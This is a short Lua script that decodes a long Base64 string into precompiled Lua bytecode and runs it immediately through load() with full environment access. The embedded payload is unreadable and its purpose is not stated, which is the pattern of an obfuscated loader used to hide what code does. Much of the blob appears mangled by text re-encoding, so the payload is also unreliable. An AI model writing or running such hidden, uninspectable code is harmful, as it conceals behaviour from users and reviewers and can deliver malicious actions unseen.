local b = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
local function Base64Decode(data)
    data = string.gsub(data, '[^'..b..'=]', '')
    return (data:gsub('.', function(x)
        if (x == '=') then return '' end
        local r,f='',(b:find(x)-1)
        for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and '1' or '0') end
        return r;
    end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x)
        if (#x ~= 8) then return '' end
        local c=0
        for i=1,8 do c=c+(x:sub(i,i)=='1' and 2^(8-i) or 0) end
        return string.char(c)
    end))
end

assert(load(Base64Decode("G0x1YVIBBAQECBnCkw0KGg0KAcKGw6ABC8KAQSRAwoBGQEBHwoDDgMKAw4bDgEDDh8OBAV3CgMKAAVtAF8KAH8KAQUABwovCgMOLw4AGAULDisKBwoPDisKAw4LChMOKw4PChcKKw4DCg8OLw4AGAULDisKBwoPDisKAw4PChMOKw4DDg8KFworDgMKAwobDpQtBS8OBwoZBRErCgcKBwoNKwoHDhMKESsOBw4TChQ0KQQHCiGVBwoABwoACwp1BwoDCgAHCgAHCnUHCgMKXw4DDv39GRcKBQAVdQAFGwoBFR8OAw4XChsOAQMKHRgHDhsOAQMOHw4YBw47DgMKAwowBQQZLAQFKw4FGwo3ChkFHwp3CgcKASsKBAcKOwoZBR8KdwoHCgMKOw4FHA0rCgQHCj8KGQUhKwoEBwpDCi8OBAcOGwoFIBsOCSMKKAcKCA8OGAUkGQknCigHCggPDhsKBSQbDgknCigHCggPDhgFKBkJKwooBwoIDw4bCgUoGw4JKwooBwoIDw4YBSwZCS8KKAcKCA8OGwoFLBsOCS8KKAcKCA8OGAUzDh0HDjAMGAkwHwoJMBEZCQEfDgsOMBMKGQkDChwJNBcOGwoJFw4dCw40FCwNLA8KLA8OLAwbChE0Hw4RNCEbChE1HBMOOCMKGwoRFwodETgnDhsKERcOHwoTDjgkGwoVFB8OFTg0KRsKFRUcFw48NCsKGwoVFwodFTwvDhsKFRcOHwoXDjwsGwoZFB8OGTwxGwoZFRwbDkAzChAbCgAHCgwfDgcOHBgHDiAZDCMKLCMOBw4gGAwlDCcKBSRDDgwkDDQpDDQrCgcOKBsODDQoDC0MLwoMLw4QLwoBGwoxQSgzDkcKhSwzClQzCgBjCjUxRGcOLDAIBwo0RQA0KE8KBw40Rw4QNCsOkTAJKw4wMGcKVDMKAGMKNTFEZw4sMAgENChJBTRLCgcKNEsOBw40Sw6RMAkrDjAwZwpUMwoAYwo1MURnDiwwCAQ0KE0FNE8KBwo0Tw4HDjRLDpEwCSsOMDBnClQzCgBjCjUxRGcOLDAIBw40TQQ0KFMKBTRTDgcONEsOkTAJKw4wMGcKVDMKAGMKNTFEZw4sMAgHCjRRBw40UwoENChXDhA0Kw6RMAkrDjAwZwpUMwoAYwo1MURnDiwwCAU0VQcKNFcKBTRTDgcONFcOkTAJKw4wMGcKVDMKAGMKNTFEZw4sMAgENChZBTRbCgcKNFsOEDQrDpEwCSsOMDBnClQzCgBjCjUxRGcOLDAIBw40WQQ0KF8KBTRfDhA0Kw6RMAkrDjAwZwpUMwoAYwo1MURnDiwwCAU0VQcKNFcKBTRTDgcKNF8OkTAJKw4wMGcKVDMKAGMKNTFEZw4sMAgHDjRdBDQoYwoHCjRbDhA0Kw6RMAkrDjAwZwpUMwoAYwo1MURnDiwwCAU0YQcKNGMKBw40Yw4QNCsOkTAJKw4wMGcKlwowIwoAMwrLCpcOMw6UMASVNAWXCjQHCpcONAcOlDQoCJU4CZcKOAsKlw44Cw6UOAyVPAwjCj8KyJcKPA2XDjwPCgcKPGcOBw48ZARAaQVAawoQQwoAGEUwHwpFaIkYRTEfDkcOaIsKGEUzCh1FMI8OBERsNClLDkSNlEgTCpVIEw6XCkgQlw5MEZRMFwqVTBcOlwpMFCxQNChTClMK2ZcOUBQ0KVBTCt2UUBg0KVMKUwrdlVAYNClQUwrhlwpQGDQpUwpTCuGXDlAYNClQUwrllFAcNClTClMK5ZVQHDQpUFMK6ZcKUBw0KVMKUwrplw5QHDQpUFMK7TMKUXShdwpQBwosUw4sUCxVLFcKEFcOlFQjCisOUwpXCu8OlVQjCisOUFcK8w6XClQjCisOUwpXCvMOlw5UIworDlBXCvcOlFQnCisOUwpXCvcOlVQnCisOUFcI="),nil,"bt",_ENV))()